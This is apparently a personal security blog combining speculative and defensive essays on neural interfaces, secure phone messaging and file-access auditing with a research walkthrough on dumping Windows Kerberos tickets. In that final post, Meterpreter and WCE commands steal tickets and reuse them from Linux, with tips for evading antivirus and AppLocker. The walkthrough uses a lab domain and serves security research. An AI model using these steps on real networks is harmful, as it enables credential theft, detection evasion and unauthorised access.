The most important innovation of the 21st century

Some innovations have gone down in history as more important than the others, transforming whole societies. For example the steam engine taught us to transport people and items, power industries by something else besides manpower. Antibiotics ushered the era of modern medicine. Pesticides and food preservatives increased dramatically the availability of nutrition. The invention of the microchip started the dawn of the information age.

Most curiously most of the major innovations have not been that significant on their own. Instead they have had catalytic properties, supporting complete fields of science, culture, and economic activities. Most have been improved, and discarded by improved versions that came right after them. That has been the major theme of 21st century. By standing on the shoulders of the giants we have constantly been reaching higher and further, improving upon what came before.

It is an exciting time to be alive, because we are slowly beginning to understand what we do not know, and the rate for gathering information is accelerating to neck breaking speeds. Indeed, we have hit a plateau where we see thousands of things but have no capability of determining what is significant and what is not.

Luckily, I happen to know what will go down in the pages of history as the most important innovation of the 21st century. It is the one that allows us to stay on top of the information wave, provides endless new angles on the human mind, acts as a catalyst for solving the 21st century issues (war, famine, disease, pollution, greed, etc), and makes effective immortality a reality.

I am talking about direct neural interfaces, and specifically the upcoming consumer applications.

The play on human senses

You reading this, and experiencing what you experience right now is not really that complex. It is all just tiny electrical impulses, assisted and partly caused by chemistry.

Interfacing directly with a sufficient amount of human nerves allows substituting the nerve inputs from our sensory organs with a virtual reality experience that we are unable to distinguish from real life. This opens up several possibilities in the educational fields.

Take professions requiring long training before reaching sufficient proficiency in motoric, judgmental, and other mental skills. Good example would be a surgeon. With a direct neural interface it will be possible to record what an expert perceives, how the tools feel when being operated masterfully, and to play it all back to a novice. Instead of pale description a way of sharing  executions indistinguishable from reality would allow accelerated paths towards expertness. Getting a new type of feedback for activity, to be able to compare, and correct constantly against a master would be magnificently efficient.

i_know_kung_fu

People working in dangerous occupations would be allowed to screw up in training without major consequences. For instance soldiers, police, and firemen could test new tactics. In an event of their deaths they would be able to reflect on the experience, get the viewpoint of their adversaries played back to them, and retry the operation ad nauseam until getting their actions correct.

This would increase the availability of certain types of skilled workers drastically, make their skills superior, and shorten the unproductive periods of learning. The impact on societies would be profound. But that is not all, as the salesmen like to say.

What if the Hollywood made mission impossible 5 so that you would actually see and feel all that Ethan Hunt does? That is all just a few terabytes of data to be streamed into your neural pathways, and entirely doable. The power of that experience would transform the  entertainment industry for forever.

ethan-hunt-screencaps-mission-impossible-34541173-1920-800

Medicine is an other field that will gain a lot from direct neural interfaces. Replacing lost limbs by something that feels and actually works is a noble cause. That this is done already  to some extent. Some legs, hands, and even a few eyes are already functional, although on a very basic level. At some day the replacement parts will be better than the originals and we will notice that they might be other reasons besides losing limbs for replacing them. Enhancing human senses by adding new sensory organs, or limbs tailored for specific tasks, can open endless possibilities.

maVtKGv

And what about just building user interfaces for everyday stuff to improve the quality of everyday life? Just passive listening would make ubiquitous computing so much easier to implement. It is hard enough to attempt to anticipate the wishes of a human being from external cues. Being able to take into account the internal status would certainly help. Before that is made possible I fear that we will mostly keep seeing random hits and misses on the success of ubiquitous computing.

Towards higher intelligence

Extending human mind requires a bit more than playing around with our senses. It is however also doable by direct neural interfaces.

Think about something mundane. Say, a banana. What color it is? You instantly know what the answer is, and recognize that this is usually true. It is not like you thought with a booming voice in your mind “GOOGLE BANANA COLOR” like you would likely do with our present personal knowledge assistance. What happened was a search for keys to information, and a pervasive retrieval. We know whether we know things, even before we actually recall them. Then a mysteriously effortless process produces us the results. Usually, because we are not perfect.

Direct neural interfacing would make it possible to produce the “keys” and the “information” (this is close to the models of cognitive psychology) for everything we come up with, without us noticing anything. Like a spooky action in distance we would know everything that is searchable from digital libraries such as Wikipedia, given they were indexed and prepared properly. Now think about how much more effectively a person like that could solve real life problems, go through variations of theories, and synthesize new solutions. In several areas of human life that would change everything, although staying sane would probably require implementing some safeguards.

Moving further, how about instant skills, and downloading skills straight to parts of your brain? This time not just impressions of someone doing something, but the actual skills directly! The thing seen in the Matrix movies is not that far out as one might believe. Again, not overloading our brain pans would be a minor issue, but training neural pathways is just about generating correct stimulus, and solvable. Skills would here naturally include complex thoughts, such as theories about modern quantum physics, and other constructs.

bin

The previous gives a new meaning to the old saying “to stand on the shoulders of the giants“. Instead of pieces of data it will be possible to teach the way those giants actually thought about the matters, the processes they used to come up to their conclusions, and the complete mindsets behind issues. And it wouldn’t be just a description but exactly as the giants saw the issues. That would allow continuing the work on top of all that knowledge and wisdom even though the original giant was gone already.

Thus, we are moving close to describing a catalyst that can be used to solve the 21st century issues. Simply moving the capability of mental processing to a new level we can easily solve what we choose. The ability to master several fields of study simultaneously and to synthesize between, nearly limitless fact availability, and the trainability of the methods of effective thinking are sure to slingshot the productivity of every R&D type activity to the stratosphere.

Melding towards immortality

Nothing expels monsters like a beam of light. Nothing expels racism, bigotry, and prejudice like information. Information about an other, their point of view, and how they feel. That is what might be possible in the future – playing an other person’s mindsets to an other. That would show to each one of us that we are of the same, and profoundly change how we act towards each other. We can not hurt ourselves, as it would be insanity towards ourselves. And that’s what would change our world if it were made available for everyone to experience.

Spock_&_Kirk_Mind-Meld

How about sharing thoughts, live, then? That is certainly possible. Instead of talking with each other, we could send each others what would seem like a stream of feeling fragments, thought constructs, and memories. Semantic, truly accurate and perfectly understandable communications is something we presently lack. We approximate even our most complex thoughts with crude sounds, transmit them over by archaic methods, lacking parts of the context, and the other party has to attempt grasping the meaning from that, usually failing to some degree. It’s a wonder that humanity made it out of the bronze age to think of it.

Thinking together with another person will be the next step. Consider what happens when you join five normal persons that all have a common goal at the time to solve a common problem. If they are disciplined to adhere to certain rules, their combined thinking power might actually help them to be more than they are, and to solve some issues humans are simply not smart enough to deal on their own. And as I have pointed out several times already, most innovations happen when things from even surprising areas are synthesized together. So, why not think with something entirely different, probably a computer, as well.

9140033397_8aea29c960_o

That brings us to the issue of immortality. We are our thought processes. Those are mostly electric impulses (although extremely complex). If we can be recorded, uploaded, and we can think with other people (or machines), what demands that we think inside our heads? The answer is, probably after considerable refining of the idea, nothing at all. Moving ourselves to new platforms when our physical shells get damaged or too old should not be too challenging. It is after all just basic continuation of everything I have described previously, meaning that effectual immortality is at our grasps.

Blue ocean

The funny thing is, there is a lot of work being done to improve the human computer interaction. Some of this work is reaching for direct neural interfaces even without realizing it. Take Oculus VR, Google Glass, or smart phones with all their features for example. We will look in couple decades at all of that with a nostalgic smile. The cool kids are already working towards the better stuff, but they lack the complete vision, and goals for full spectrum dominance. Taking that stuff out of the laboratories is the key to success.

That’s the ironic part. It takes a lot money to develop this stuff to actual consumer product stage. Less than 50 companies in the world might have the necessary resources for that. The required technologies would be all patentable, and potentially worth trillions of dollars in technology licensing feeds. After all, nearly every industry and field of economic or cultural activity stands in queue to utilize them. Couple billion mobile devices, billion personal computers to replace. A few dozen billion ubiquitous appliances to enhance. There is a perfect blue ocean situation here. Heck, it’s more like a water world.

Blue-Ocean-1920x108012

Even though there are early demonstrators, and other reasons to believe everything is possible, there is still no massive investment. Everyone wants to see someone else go first. The larger the company the more careful it tends to be. They got to become big somehow, and they are trying to stay large. So, avoiding risks is rewarded. Let some smaller to take risks, and as it is common nowadays, buy out the small ones before they become challengers. Ha. So, the investment is clearly out of the question. Even though the prize is trillions of $$$$. Baffling. Sad. Ironic.

I have a pretty simple motivation here. I am writing this in the hopes that I get to say “what did I say” in my lifetime. In case I get any chance to invest myself into what I described, I will jump in. I know it’s the holy grail of 21st century. In case I get any chance to work with a project that works with this stuff, I will instant jump at that chance. If I get to talk with any brave enough VC with spare a few billion dollars, I will try to convince that my vision is correct.

How (not) to build a secure mobile messaging platform

Lately there has been noticeable efforts for secure mobile messaging platforms. There are simply too many already to event start listing them. Most of the nation states seem to be working to obtain one, with or without commercial partners. Products come and go. So far I have not seen one that touches the fundamental problem that there is a difference between mass surveillance and being actually targeted by a state level aggressor. This is a post about a few things that you would have to take into account when the game was not only about mass surveillance.

Hardware architecture

The biggest issue with just taking some generic reference hardware and slapping a hardened Android on it is the architecture. This should convey the idea perfectly: common_architecture

The hardening is most usually focused around what is referred to as application processor that runs the main operating system. The communications processor is ignored, although it is significant for several reasons:

  • It is actively in contact with the phone network
  • It is not simple – some tasks require complex logic and serious calculating power
  • Some of those tasks include adjusting operations to the feedback given by the network base stations
  • The architecture allows it to bypass the application processor and independently access sources of potentially interesting information – for instance the microphone
  • Malign activities done by the communications processor can be made mostly invisible to the other components
  • It does offer an attack surface for parties with resources to hack the common chipsets
  • Some or most of these chips are black boxes to the vendors using them

As a result, if you are using an encrypted VOIP service while someone has control of the communications processor, listening to the conversation is undetectable and possible via a side channel attack. This is not a theoretical threat either. Let’s take this historical device for instance:

150px-Nokia_3310_blue

Yes, it’s a Nokia 3310. A few models in that line had a network monitoring firmware. At least on those models you could command the application processor to power off independently. After that you could call that phone with special codes, the communications processor would answer the call and let you listen to everything. The phone looked completely dead to the user. Taking a device that has even a chance of functioning like that into any secure working area is a huge risk!

The point here is, taking into account only hardening the application processor is a major issue. I am not saying that the most common phones nowadays have security vulnerabilities or backdoors in their communications processors. What is significant is that the hardware architecture of modern phones was never designed for security. Every single component is handled as being trustworthy. At least the ones facing the network should be sandboxed properly, but they are not!

It should be noted that secure sourcing is hard. Remember these images of NSA intercepting hardware shipments to modify them before they reach customers:

nsa-pwn-cisco

A proper architecture that would not implicitly trust every component would at least require meddling with several components in the supply chain, making the option less attractive and harder to pull off. Some of the commonly exploited basic cases might prove impossible. Defensive architecture really could level the playing field.

Other interfaces

Let’s say the mobile device had a perfect encrypted VOIP solution. It was completely audited, and accredited for use. You could go into hostile network environments and communicate securely from there, without any fear of incidents. The encryption was heavy duty enough to protect even the most precious state secrets for the required 50+ years.

Then someone bought a cheap Bluetooth headset, paired it with the mobile device, staying within 500 meters or so eavesdropped the connection, and took a jab at the several magnitudes easier encryption scheme. While not broken, those features were not typically designed for securing really classified communications. They were designed for consumer market. Also, nearly every implementation allows by default downgrading the protocol version because consumers want their devices to work.

Now, you would be running the risk of information leak. Also, you would have to audit and accredit the Bluetooth chip, with its settings and all, and the client devices. At an immense cost. Depending on the mandated requirements for encryption and key management, that might even prove impossible. Or, you would have to disable the features altogether in a secure fashion. This, times how many similar interface features the mobile device offers. The answer to that is probably: many.

The users have hard time accepting disabling several expected features of a mobile phone, while the pointy haired bosses wish to keep the costs down. One way to meet in the middle might be allowing some devices while the user is not working with secured connections, and drop everything while a secure mode would be on. But even that requires that there can be certain level of guarantee that nothing coming via those interfaces can have permanent effect. This is something not even the NSA’s recommendations take properly into account.

Trust models

Now here’s the issue. The cryptographic algorithms are just one part of encryption. After the basics are laid out correctly the key management becomes more important, and the primary attack surface of the encryption. Probably no one is stupid enough to challenge for instance ECDHE-ECDSA-AES256-GCM-SHA384, when you can just look for weaknesses from how the keys are produced, transported, and utilized.

Interestingly, here the requirements for private users and larger organizations (government agencies, large corporations) differ. Others want a full blown PKI, because they need the flexibility and management features. The solutions for that target audience usually offer all of that. The others, well. They’d rather not trust external CAs, because they really are not trustworthy for implementation issues or for principle. The principle is probably most significant issue here for many.

After all, if the CA can screw users over by for instance generating secondary certificates with their identities, why would a citizen that does not trust his government trust a CA run by the same government? Why would he trust any commercial CA that can be affected by that government? Such a user might be better off with something that has less centralized key management. Ideally things should, if you can not trust PKI systems, work more like key signing parties where you meet with people, authenticate them, and cross-sign your keys. However solutions that come halfway like Silent Circle are probably more convenient.

Any secure mobile messaging platform that wishes to gain considerable market penetration would probably have to offer both models simultaneously, and let the users choose.

Identification and key management

It is clearly insufficient to identify the mobile device for trusting information to be shared with the other party. That’s where strong electronic identification comes into play as the gold standard of user authentication. Basically it stands for 2-factor authentication, requiring combining both “what you have” and “what you know” to determine the identity.

However, some alternatives fail spectacularly when talking about mobile devices. Mobile certificates and other locally installed certificates are roughly as useful as the classic ident system. At best they make a nice Douglas Adams style skit where the device is trying to figure out whether it actually has the certificate file that it has, and can it detect tampering done to itself. (It is impossible, and usually just leads to chicken-and-egg type problems.)

What is required is HSM, providing cryptographic services to the system while simultaneously guaranteeing that leaking the private keys is impossible. Before that is available in some form to mitigate risks related to key storage, building secure mobile messaging platform is slightly dubious as an idea. The current architecture of common mobile devices to my knowledge lack HSM functionality. It might change however because there is a considerable push for enabling mobile payments, which  ultimately requires solving the same issue.

The role could however be fulfilled also by a commercial token or by some of the most common HSMs on this planet:

455px-Visa_Electron

The example card has no magnetic stripe, and the number series are informational only. It is a direct debit card, where the chip works as HSM. In order to exploit it the user most commonly has lost control of both their PIN (“what you know”) and the physical card itself (“what you have”). While cloning the chip including the encrypted data is possible, there haven’t been attacks based on that in the wild. The security model related to the smart card is actually surprisingly solid. The phones just lack reader hardware.

Availability, quality of keys and key management, pricing, easy of use, and the relation all work against building truly secure mobile messaging platform. Most solutions I have seen so far have been heavily based at the end of the day on the strength of user passwords, and unwavering trust to the components of the application.

Layering issues

Let’s take two different approaches to secure mobile messaging. The first is to use whatever VOIP solution and slap an ordinary VPN product on top of it. The other is to build an integrated end-to-end encrypted messaging stack. The security profiles of these two types of solutions are significantly different.

Take the following issues for example:

  • How can the VPN credentials and the credentials to the services be enforced to be same and irrefutable?
  • After the VPN credentials are lost, what kind of attack surface the services offer when compared to the more integrated solution with end-to-end encryption?
  • Was the VOIP system actually designed to be secure by itself? Is the vendor just slapping pieces of mediocre applications together to build complexity against auditors?
  • If the VOIP system actually has security features such as encryption, why they are not good enough to stand on their own? Why is the VPN required at all?
  • How much information does the VPN solution leak for side channel attacks?
  • If the centralized parts of the messaging platform are (partially) compromised, have all the messages been leaked? Would end-to-end type system prove at least somewhat more resilient?

If nothing more, the VPN based solution is significantly more complex because the loose coupling of layers. Working a simple sequence diagram of all the key management and encryption related activity while using the messaging platform proves this instantly. Likewise the risks of simply screwing up a detail are several magnitudes higher. It is instinctively from a viewpoint of complexity a very bad idea to mix common VPN tools with what started off as a relatively simple messaging system.

About that complexity

There are 13 M SLOC in Android alone. The hardware components working with the communications, audio processing, accessories, and so on probably have a few million lines more. That’s a lot of Java, C/C++, and some other more niche languages to audit and accredit for security. Too much actually, and several features allow pulling in other code dynamically from external sources. Take browser plugins for example…

To be honest, I would rather have something that is entirely stupid, but thoroughly auditable, and audited for secure messaging. It is okay to have a separate “recreational” phone, and the one for serious tasks. Even this nasty TETRA phone is too complex probably:

170px-Motorola_MTH800

That’s however where the problems begin. It is hard for especially decision-makers to understand what is the value of simplicity when it comes to security. After all his 12 yo son seems to be doing fine with all the gadgets, and they constantly come with the promises of security.

Again, I am not saying there are known major vulnerabilities with the alternative. I am saying that I like the risk profile of going KISS more when the security really counts.

Conclusion

In my humble opinion we are still several evolutions away of reaching any hope for being able to build truly secure mobile messaging platforms. While some solutions are doing actually alright against lower level adversaries, most of them have architectural problems that become significant when state level aggressors enter the play.

The main issue is that there are too many unchecked components in the present hardware platforms. There is no real security architecture either with several important components such as sandboxing critical components and HSM modules for key storage missing. User identification will continue to be slightly unsatisfactory in the near future, and several of the marketed as secure solutions are scarily complex. The solution would be to re-design the basics from entirely different viewpoint.

My dream would be to get some actual hardware developers to work on this, and get for instance OpenBSD folks build the software layer from ground to top. Make the foundation preferable open source to benefit all. That will probably never happen though, because most target audiences are simply happy with commercial level security features. There just is not enough support I fear to warrant the use of resources. Furthermore, the phone could probably never be sold in some countries, because the authorities would not certify it for sales.

On auditing file usage

Since the time of Orange Book in the 80s three rules have been irreplaceable in IT security: always check the access rights, auditing all information usage, and never let the information leave secure domain in uncontrolled fashion. Proper mixture of authorization, stalking user activity, and limiting the used tools works still even nowadays when implemented properly.

In the major leaks that happened during the last a few years all of the previous failed. The users had bafflingly broad access rights to information, not everything was audited, and it was fairly easy to move the information outside the secured domain. As a result leaking was attractively easy, and getting caught was not apparent.

A while ago I took a look, out of curiosity, on products meant for file access auditing. Those would be the solutions that would fix the “auditing all information usage” part when customizing the information systems is not possible (COTS). I found a surprising amount of products with different feature sets and value propositions. A few of them had pretty steep price tags and fairly advanced features.

Based on what I found out I got excited about developing my own basic version, just to maintain my own skills and for the heck of it. After a few hours of reading MSDN, nerve wrecking C/C++ software development, jury-rigging, and it’s here. The quality is so-so (might have some memory leaks, although I tried to catch them all) and I had no precise specifications, but here is Claimsman:

https://github.com/mikkolehtisalo/claimsman

With the solution all file accesses cause events that will be forwarded to centralized log management system. I did not implement hashing the files, or taking samples, because those activities would probably have a noticeable performance hit on the target, but that would be trivial to add. What comes out of the box is default log management interface like the following.

claimsman

After the information is in the centralized log management system it is relatively easy to generate for instance a weekly report about all the file accesses. In conjunction with AD it is possible to get the manager information, run everything through a good PDF template generator, and email the reports. As a report every manager could get weekly report of all the files their subordinates have been working on.

After the knowledge of previous arrangement would spread that would discourage people from even attempting to conduct suspicious activities in the environments where materials of higher classification are being processed. The impact to overall security would in the long run be far more significant than the actual technical feature. The tools of IT security work at their best when they have a psychological impact. Absurd, but true. It’s not always the best to turn all the technical knobs to 11.

On the other hand, some level of concessions probably have to be made to ensure the privacy of users. At least in the lower security level environments this issue may rise, because the employees have, in many jurisdictions, commonly limited privacy rights to use the employer’s tools for private business, such as accessing private banking while on lunch break.

Windows kerberos ticket theft and exploitation on other platforms

Introduction

In the past there has been a lot of talk about pass the hash, but surprisingly little about different methods for exploiting kerberos tickets. Besides the discussion focused on golden tickets the Kerberos has not really ever been a major target for abuse.

I decided to take a look at how the kerberos tickets can be dumped from a Windows target and re-used on Linux. It was surprisingly easy to accomplish.

Prerequisites

The following are required for this approach:

This post focuses on manipulating the tickets and Kerberos, and omits less relevant parts.

Ticket theft

Upload the WCE and run it:

meterpreter > upload wce.exe
[*] uploading : wce.exe -> wce.exe
[*] uploaded : wce.exe -> wce.exe
meterpreter > execute -f wce.exe -i -H -a "-K"
Process 604 created.
Channel 2 created.
WCE v1.42beta (X64) (Windows Credentials Editor) - (c) 2010-2013 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.

Converting and saving TGT in UNIX format to file wce_ccache...
Converting and saving tickets in Windows WCE Format to file wce_krbtkts..
5 kerberos tickets saved to file 'wce_ccache'.
5 kerberos tickets saved to file 'wce_krbtkts'.
Done!

Download wce_ccache for use with MIT or Heimdal Kerberos. It is in fact a credentials cache file, that has to be just copied into place after some basic configuration. In case you are wondering, wce_krbtkts is for Windows, and can be imported to an other Windows instance with WCE (with the -k option).

meterpreter > download wce_ccache
[*] downloading: wce_ccache -> wce_ccache
[*] downloaded : wce_ccache -> wce_ccache

Setting up

The following steps are required to configure a Linux platform for “joining” the Windows kerberos realm.

1. Make sure the clocks are synchronized. Kerberos challenges fail if the clock difference is more than 5 minutes. Find out the remote time and date:

meterpreter > execute -i -f cmd.exe -a "/C echo %TIME% %DATE%"
Process 2140 created.
Channel 10 created.
23:14:32,90 to 25.06.2015

You can either change the local time manually (for temporary use), or configure the ntpd to synchronize the time from the domain controllers.

2. Make sure you have the Kerberos tools installed. For instance Kali Linux does not by default, and you have to install the tools:

apt-get -y install krb5-user

3. You want to use the target domain’s DNS server to be able to access the service records:

meterpreter > execute -i -c -f ipconfig.exe -a "/ALL"
Process 2620 created.
Channel 15 created.
-- snippetysnap
 DNS Servers . . . . . . . . . . . : 192.168.122.89

Test that you can resolve names from the domain’s DNS service, because Kerberos is really bent on utilizing DNS:

# cat /etc/resolv.conf
nameserver 192.168.122.89
# nslookup
> WIN-55NRNN3SRQ4.hacknet.x
Server: 192.168.122.89
Address: 192.168.122.89#53
Name: WIN-55NRNN3SRQ4.hacknet.x
Address: 192.168.122.89

4. Find the KDC, the domain name, and the NETBIOS name. There are several ways to accomplish this, for example:

meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
 --- ---- ---- ---- ------- ---- ----
 2472 1188 cmd.exe x86_64 1 HACKNET\user C:\Windows\System32\cmd.exe

meterpreter > migrate 2472
[*] Migrating from 2692 to 2472...
[*] Migration completed successfully.
meterpreter > execute -i -f cmd.exe -a "/C set"
LOGONSERVER=\\WIN-55NRNN3SRQ4
USERDNSDOMAIN=HACKNET.X

5. Use the previous information to create a valid Kerberos configuration file /etc/krb5.conf:

[libdefaults]
 default_realm = HACKNET
 krb4_config = /etc/krb.conf
 krb4_realms = /etc/krb.realms
 kdc_timesync = 1
 ccache_type = 4
 forwardable = true
 proxiable = true
v4_instance_resolve = false
v4_name_convert = {
host = {
rcmd = host
ftp = ftp
}
plain = {
something = something-else
}
}
fcc-mit-ticketflags = true
[realms]
HACKNET = {
kdc = WIN-55NRNN3SRQ4.hacknet.x:88
admin_server = WIN-55NRNN3SRQ4.hacknet.x
default_domain = hacknet.x
}
[domain_realm]
.hacknet.x = HACKNET
hacknet.x = HACKNET
[login]
krb4_convert = true
krb4_get_tickets = false

6. Copy the credentials cache file and query for tickets:

# klist
klist: No credentials cache found (ticket cache FILE:/tmp/krb5cc_0)
# cp wce_ccache /tmp/krb5cc_0
# klist
Ticket cache: FILE:/tmp/krb5cc_0
Default principal: HACKCLIENT$@HACKNET.X
Valid starting    Expires           Service principal
23/06/2015 20:43  24/06/2015 06:43  krbtgt/HACKNET.X@HACKNET.X
renew until 30/06/2015 20:43
23/06/2015 20:43  24/06/2015 06:43  krbtgt/HACKNET.X@HACKNET.X
renew until 30/06/2015 20:43
23/06/2015 20:43  24/06/2015 06:43  krbtgt/HACKNET.X@HACKNET.X
renew until 30/06/2015 20:43
23/06/2015 20:43  24/06/2015 06:43  cifs/WIN-55NRNN3SRQ4.hacknet.x@HACKNET.X
renew until 30/06/2015 20:43
23/06/2015 20:43  24/06/2015 06:43  HACKCLIENT$@HACKNET.X
renew until 30/06/2015 20:43
23/06/2015 20:43  24/06/2015 06:43  LDAP/WIN-55NRNN3SRQ4.hacknet.x/hacknet.x@HACKNET.
renew until 30/06/2015 20:43

Using

Let’s take a web service that uses GSSAPI/Kerberos authentication. When accessed without working configuration it will respond bluntly with 401: authfail Luckily after previous configuration steps all that has to be done is to configure Firefox to attempt GSSAPI/Kerberos for this domain: firefoxconf … And after previous accessing the service with credentials taken from Windows succeeds: Successfully using the stolen tickets

For other applications the required configuration differs. For instance accessing CIFS shares requires sec=krb5 mount setting.

Potential issues

Mismatching confurations

Kerberos is somewhat unforgiving for configuration issues. If the supported encryption types for instance do not match, the authentication challenges will fail. The slightest problem in using DNS or too much clock skew, and the authentication challenges again fail. Most of the applications fail to report the actual reason to the user, and debugging may be required.

The following environment variables will make Firefox print out extensive debug log:

export NSPR_LOG_MODULES=negotiateauth:5
export NSPR_LOG_FILE=/tmp/moz.log

The following environment variable will make krb5-libs print out trace log:

export KRB5_TRACE=/tmp/krb.log

No suitable credentials

As we saw in the example, there are several credentials for different purposes. Some are used for authenticating the server to the domain services, some for authenticating user for logon, and most work only against a specific Service Principal Name. In practice that means you can sometimes access only what a logged on user has recently accessed.

That’s why Ticket Granting Tickets exist. If your setup has been configured perfectly the domain will be queried for missing tickets based on previous authentication done against the domain. In case this fails you have to debug your configuration as instructed above.

Antivirus software & AppLocker

Both antivirus software and AppLocker can prevent the WCE from being run. Since you probably have system level privileges anyway, you can simply disable those features. Alternative is to execute the WCE from memory. Meterpreter offers an option for that:

execute -H -m -d calc.exe -f wce.exe -a "-K"

It has however been reported that WCE might still touch disk by temporarily writing a DLL. In case this is unacceptable, a method  exists to use an alternative utility called Mimikatz.

Discussion

The demonstrated does not mean that Kerberos is broken. Not at all. It does not make an initial attack vector, and the potential methods of protection would likely have negative side effects. For instance limiting the source hosts for tickets would hinder network roaming – not very good idea for mobile users.

The past gold ticket vulnerability required similar theft of keys, but was also worsened a design flaw in the Windows KDC’s way of handling keys.

An other possible trick is simply to have the target proxy the requests to services. The idea is that the computer that has an actual valid Kerberos ticket proxies the requests on behalf of the attacker while responding to challenges. This requires special software that is likely application specific.